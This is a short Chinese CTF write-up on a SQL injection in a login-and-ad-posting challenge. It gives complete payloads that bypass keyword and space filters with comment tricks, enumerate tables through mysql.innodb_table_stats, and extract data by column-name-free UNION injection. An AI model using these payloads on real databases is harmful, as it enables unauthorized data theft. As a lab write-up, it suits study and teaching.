打开题目，看到登录口，注册账号看看

admin2，112

申请发布一下广告，sql注入试试

查看详情

看到sql，猜测sql注入，进行测试时发现空格、or、#、--+、and等进行了过滤，目前基本可以确定注入点在这个地方，在进行注入的时候我们需要先判断列数1'/**/group/**/by/**/n,'

找不到，被过滤了，确定列数之后确定哪几个可以展示，payload

1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

最终得到2和3可以展示

确定回显信息那就确定基本信息，比如数据库名，用户名，版本信息等等

得到用户名等信息

information_schema还有or，因为or被过滤，因此也无法使用。所以这里只能采用innodb_index_stats和 innodb_table_stats来进行绕过。payload：1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='web1'&&'1'='1

进行无列名注入获取flag值，因为没有mysql.innodb_column_stats这个方法，查不了列名

那就直接取名，按别名正常继续注入

1'/**/union/**/select/**/1,(select/**/group_concat(c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

或者

1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

这两个都可以

注入之后得到flag

flag{128b5c6d-2fc6-4e9c-946b-69d20d2fb44b}